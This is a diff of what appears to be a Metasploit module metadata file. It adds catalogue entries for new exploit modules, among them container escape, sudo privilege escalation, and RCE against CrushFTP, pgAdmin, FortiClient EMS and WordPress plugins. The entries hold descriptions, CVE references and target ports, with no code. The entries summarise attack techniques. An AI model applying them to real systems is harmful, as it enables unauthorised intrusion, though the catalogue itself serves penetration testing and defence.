+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pulse_secure_cmd_exec": {
    "name": "Pulse Secure VPN Arbitrary Command Execution",
    "fullname": "exploit/linux/http/pulse_secure_cmd_exec",
@@ -84982,6 +85847,65 @@

    ]
  },
+  "exploit_linux/local/docker_privileged_container_kernel_escape": {
+    "name": "Docker Privileged Container Kernel Escape",
+    "fullname": "exploit/linux/local/docker_privileged_container_kernel_escape",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2014-05-01",
+    "type": "exploit",
+    "author": [
+      "Nick Cottrell <Rad10Logic>",
+      "Eran Ayalon",
+      "Ilan Sokol"
+    ],
+    "description": "This module performs a container escape onto the host as the daemon\n            user. It takes advantage of the SYS_MODULE capability. If that\n            exists and the linux headers are available to compile on the target,\n            then we can escape onto the host.",
+    "references": [
+      "URL-https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities",
+      "URL-https://github.com/maK-/reverse-shell-access-kernel-module"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-01 13:30:16 +0000",
+    "path": "/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/docker_privileged_container_kernel_escape",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/docker_runc_escape": {
    "name": "Docker Container Escape Via runC Overwrite",
    "fullname": "exploit/linux/local/docker_runc_escape",
@@ -86426,6 +87350,122 @@

    ]
  },
+  "exploit_linux/local/progress_flowmon_sudo_privesc_2024": {
+    "name": "Progress Flowmon Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_flowmon_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Flowmon.\n          Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  This\n          includes executing a PHP command with a specific file name. If the\n          file is overwritten with PHP code it can be used to elevate privileges\n          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-29 08:39:06 +0000",
+    "path": "/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_flowmon_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
+  "exploit_linux/local/progress_kemp_loadmaster_sudo_privesc_2024": {
+    "name": "Kemp LoadMaster Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs",
+      "bwatters-r7"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Kemp\n          LoadMaster.  Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  Some files\n          have this permission are not write-protected from the default 'bal' user.\n          As such, if the file is overwritten with an arbitrary file, it will still\n          auto-elevate.  This module overwrites the /bin/loadkeys file with another\n          executable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
+      "URL-https://kemptechnologies.com/kemp-load-balancers"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Dropper",
+      "Command"
+    ],
+    "mod_time": "2024-05-10 08:54:23 +0000",
+    "path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/ptrace_sudo_token_priv_esc": {
    "name": "ptrace Sudo Token Privilege Escalation",
    "fullname": "exploit/linux/local/ptrace_sudo_token_priv_esc",
@@ -87815,7 +88855,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2023-12-19 19:01:45 +0000",
+    "mod_time": "2024-04-22 15:12:27 +0000",
    "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -87827,7 +88867,8 @@
        "crash-service-down"
      ],
      "Reliability": [
-        "repeatable-session"
+        "repeatable-session",
+        "event-dependent"
      ],
      "SideEffects": [
        "artifacts-on-disk",
@@ -88597,7 +89638,7 @@
      "Linux Command",
      "Unix Command"
    ],
-    "mod_time": "2023-11-07 09:21:04 +0000",
+    "mod_time": "2024-04-15 11:06:50 +0000",
    "path": "/modules/exploits/linux/misc/cisco_ios_xe_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/cisco_ios_xe_rce",
@@ -95240,6 +96281,61 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/fileformat/gitlens_local_config_exec": {
+    "name": "GitLens Git Local Configuration Exec",
+    "fullname": "exploit/multi/fileformat/gitlens_local_config_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-11-14",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Paul Gerste"
+    ],
+    "description": "GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git\n          commands. A repo may include its own .git folder including a malicious config file to\n          execute arbitrary code.\n\n          Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10",
+    "references": [
+      "URL-https://www.sonarsource.com/blog/vscode-security-markdown-vulnerabilities-in-extensions/",
+      "URL-https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/",
+      "URL-https://github.com/gitkraken/vscode-gitlens/commit/ee2a0c42a92d33059a39fd15fbbd5dd3d5ab6440",
+      "CVE-2023-46944"
+    ],
+    "platform": "",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux/Unix (In-Memory)",
+      "PowerShell (In-Memory)"
+    ],
+    "mod_time": "2024-04-18 17:31:02 +0000",
+    "path": "/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/gitlens_local_config_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/fileformat/js_unpacker_eval_injection": {
    "name": "Javascript Injection for Eval-based Unpackers",
    "fullname": "exploit/multi/fileformat/js_unpacker_eval_injection",
@@ -95487,7 +96583,7 @@
      "Microsoft Office Word on Windows",
      "Microsoft Office Word on Mac OS X (Python)"
    ],
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/multi/fileformat/office_word_macro.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/office_word_macro",
@@ -95588,6 +96684,57 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/fileformat/visual_studio_vsix_exec": {
+    "name": "Code Reviewer",
+    "fullname": "exploit/multi/fileformat/visual_studio_vsix_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-22",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "Reviews code",
+    "references": [
+      "URL-https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1",
+      "URL-https://code.visualstudio.com/api/get-started/your-first-extension",
+      "URL-https://code.visualstudio.com/api/references/activation-events"
+    ],
+    "platform": "NodeJS",
+    "arch": "nodejs",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-04-17 16:13:44 +0000",
+    "path": "/modules/exploits/multi/fileformat/visual_studio_vsix_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/visual_studio_vsix_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/fileformat/zip_slip": {
    "name": "Generic Zip Slip Traversal Vulnerability",
    "fullname": "exploit/multi/fileformat/zip_slip",
@@ -96716,7 +97863,7 @@
      "Automatic (Dropper)",
      "Unix Command (In-Memory)"
    ],
-    "mod_time": "2021-10-10 17:01:15 +0000",
+    "mod_time": "2024-05-01 20:01:38 +0000",
    "path": "/modules/exploits/multi/http/apache_normalize_path_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_normalize_path_rce",
@@ -96769,7 +97916,7 @@
    "targets": [
      "Automatic (Unix In-Memory)"
    ],
-    "mod_time": "2023-06-08 17:34:45 +0000",
+    "mod_time": "2024-04-26 14:24:08 +0000",
    "path": "/modules/exploits/multi/http/apache_rocketmq_update_config.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_rocketmq_update_config",
@@ -97448,6 +98595,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/avideo_wwbnindex_unauth_rce": {
+    "name": "AVideo WWBNIndex Plugin Unauthenticated RCE",
+    "fullname": "exploit/multi/http/avideo_wwbnindex_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-09",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution (RCE) vulnerability\n          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the\n          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`\n          function without proper sanitization. By exploiting this, an attacker can leverage the\n          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows\n          for the execution of commands and control over the affected system. The exploit is\n          particularly dangerous because it does not require authentication, making it possible\n          for any remote attacker to exploit this vulnerability.",
+    "references": [
+      "CVE-2024-31819",
+      "URL-https://github.com/WWBN/AVideo",
+      "URL-https://chocapikk.com/posts/2024/cve-2024-31819"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "PHP In-Memory",
+      "Unix In-Memory",
+      "Windows In-Memory"
+    ],
+    "mod_time": "2024-05-15 22:13:53 +0000",
+    "path": "/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/avideo_wwbnindex_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/axis2_deployer": {
    "name": "Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",
    "fullname": "exploit/multi/http/axis2_deployer",
@@ -98582,6 +99793,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/crushftp_rce_cve_2023_43177": {
+    "name": "CrushFTP Unauthenticated RCE",
+    "fullname": "exploit/multi/http/crushftp_rce_cve_2023_43177",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-08",
+    "type": "exploit",
+    "author": [
+      "Ryan Emmons",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploit module leverages an Improperly Controlled Modification\n          of Dynamically-Determined Object Attributes vulnerability\n          (CVE-2023-43177) to achieve unauthenticated remote code execution.\n          This affects CrushFTP versions prior to 10.5.1.\n\n          It is possible to set some user's session properties by sending an HTTP\n          request with specially crafted Header key-value pairs. This enables an\n          unauthenticated attacker to access files anywhere on the server file\n          system and steal the session cookies of valid authenticated users. The\n          attack consists in hijacking a user's session and escalates privileges\n          to obtain full control of the target. Remote code execution is obtained\n          by abusing the dynamic SQL driver loading and configuration testing\n          feature.",
+    "references": [
+      "URL-https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/",
+      "URL-https://github.com/the-emmons/CVE-2023-43177/blob/main/CVE-2023-43177.py",
+      "URL-https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update",
+      "CVE-2023-43177",
+      "CWE-913"
+    ],
+    "platform": "Java,Linux,Unix,Windows",
+    "arch": "java, x64, x86",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Java",
+      "Linux Dropper",
+      "Windows Dropper"
+    ],
+    "mod_time": "2024-03-29 12:18:16 +0000",
+    "path": "/modules/exploits/multi/http/crushftp_rce_cve_2023_43177.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/crushftp_rce_cve_2023_43177",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/cups_bash_env_exec": {
    "name": "CUPS Filter Bash Environment Variable Code Injection (Shellshock)",
    "fullname": "exploit/multi/http/cups_bash_env_exec",
@@ -99401,6 +100678,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gambio_unauth_rce_cve_2024_23759": {
+    "name": "Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability",
+    "fullname": "exploit/multi/http/gambio_unauth_rce_cve_2024_23759",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-01-19",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "usd Herolab"
+    ],
+    "description": "A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower\n          allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.\n          The identified vulnerability within Gambio pertains to an insecure deserialization flaw,\n          which ultimately allows an attacker to execute remote code on affected systems.\n          The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.\n          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,\n          potentially resulting in complete system compromise, data exfiltration, or unauthorized access\n          to sensitive information.",
+    "references": [
+      "CVE-2024-23759",
+      "URL-https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759",
+      "URL-https://herolab.usd.de/en/security-advisories/usd-2023-0046/"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, x64, x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-04-19 13:44:18 +0000",
+    "path": "/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gambio_unauth_rce_cve_2024_23759",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/gestioip_exec": {
    "name": "GestioIP Remote Command Execution",
    "fullname": "exploit/multi/http/gestioip_exec",
@@ -105349,6 +106690,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/pgadmin_session_deserialization": {
+    "name": "pgAdmin Session Deserialization RCE",
+    "fullname": "exploit/multi/http/pgadmin_session_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-04",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "Davide Silvetti",
+      "Abdel Adim Oisfi"
+    ],
+    "description": "pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow\n          a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python\n          object to execute code within the context of the target application.\n\n          This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials\n          are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object\n          using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before\n          being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no\n          credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a\n          UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also\n          requires that insecure outbound guest access be enabled.\n\n          Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin\n          underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated\n          technique whereby a payload is uploaded.",
+    "references": [
+      "CVE-2024-2044",
+      "URL-https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/",
+      "URL-https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-04-16 13:36:21 +0000",
+    "path": "/modules/exploits/multi/http/pgadmin_session_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/pgadmin_session_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/phoenix_exec": {
    "name": "Phoenix Exploit Kit Remote Code Execution",
    "fullname": "exploit/multi/http/phoenix_exec",
@@ -111777,6 +113181,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_hash_form_rce": {
+    "name": "WordPress Hash Form Plugin RCE",
+    "fullname": "exploit/multi/http/wp_hash_form_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-23",
+    "type": "exploit",
+    "author": [
+      "Francesco Carlucci",
+      "Valentin Lobstein"
+    ],
+    "description": "The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability\n          due to missing file type validation in the file_upload_action function. This vulnerability exists\n          in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary\n          files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected\n          WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the\n          server environment.",
+    "references": [
+      "CVE-2024-5084",
+      "URL-https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-06-05 10:14:48 +0000",
+    "path": "/modules/exploits/multi/http/wp_hash_form_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_hash_form_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
    "name": "WordPress Ninja Forms Unauthenticated File Upload",
    "fullname": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
@@ -113309,7 +114776,7 @@
      "Linux",
      "Unix"
    ],
-    "mod_time": "2023-11-06 09:42:59 +0000",
+    "mod_time": "2024-04-29 16:15:50 +0000",
    "path": "/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/apache_activemq_rce_cve_2023_46604",
@@ -152759,7 +154226,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2023-09-07 22:01:49 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/winrar_cve_2023_38831",
@@ -152994,7 +154461,7 @@
    "targets": [
      "Microsoft Office Word"
    ],
-    "mod_time": "2022-08-25 15:56:39 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/word_msdtjs_rce",
@@ -153055,7 +154522,7 @@
    "targets": [
      "Hosted"
    ],
-    "mod_time": "2021-12-08 17:22:44 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/word_mshtml_rce",
@@ -159777,6 +161244,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/forticlient_ems_fctid_sqli": {
+    "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE",
+    "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-21",
+    "type": "exploit",
+    "author": [
+      "Zach Hanley",
+      "James Horseman",
+      "jheysel-r7",
+      "Spencer McIntyre"
+    ],
+    "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n          platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n          can be sent directly into database queries.\n\n          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n          SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n          execution in the context of NT AUTHORITY\\SYSTEM\n\n          Affected versions of FortiClient EMS include:\n          7.2.0 through 7.2.2\n          7.0.1 through 7.0.10\n\n          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n          EMS for the necessary vulnerable services to be available.",
+    "references": [
+      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/",
+      "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py",
+      "CVE-2023-48788"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 8013,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-04-12 10:00:07 +0000",
+    "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/forticlient_ems_fctid_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/fortilogger_arbitrary_fileupload": {
    "name": "FortiLogger Arbitrary File Upload Exploit",
    "fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload",
@@ -159904,7 +161434,7 @@
    "references": [
      "EDB-41153",
      "CVE-2017-11517",
-      "URL-www.geutebrueck.com"
+      "URL-https://www.geutebrueck.com"
    ],
    "platform": "Windows",
    "arch": "",
@@ -159920,7 +161450,7 @@
      "GCore 1.3.8.42, Windows x64 (Win7+)",
      "GCore 1.4.2.37, Windows x64 (Win7+)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-04-17 13:00:41 +0000",
    "path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb",
    "is_install_path": true,
    "ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo",
@@ -163018,7 +164548,7 @@
    "targets": [
      "Windows Command"
    ],
-    "mod_time": "2023-05-08 12:11:01 +0000",
+    "mod_time": "2024-04-15 11:06:50 +0000",
    "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_adaudit_plus_authenticated_rce",
@@ -164228,6 +165758,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/northstar_c2_xss_to_agent_rce": {
+    "name": "NorthStar C2 XSS to Agent RCE",
+    "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n          vulnerable to a stored xss.\n          An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n          With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n          (agents), and kill the original agent.\n\n          Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n          Ubuntu 22.04. The agent was running on Windows 10 19045.",
+    "references": [
+      "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/",
+      "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc",
+      "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c",
+      "CVE-2024-28741"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-04-24 16:54:58 +0000",
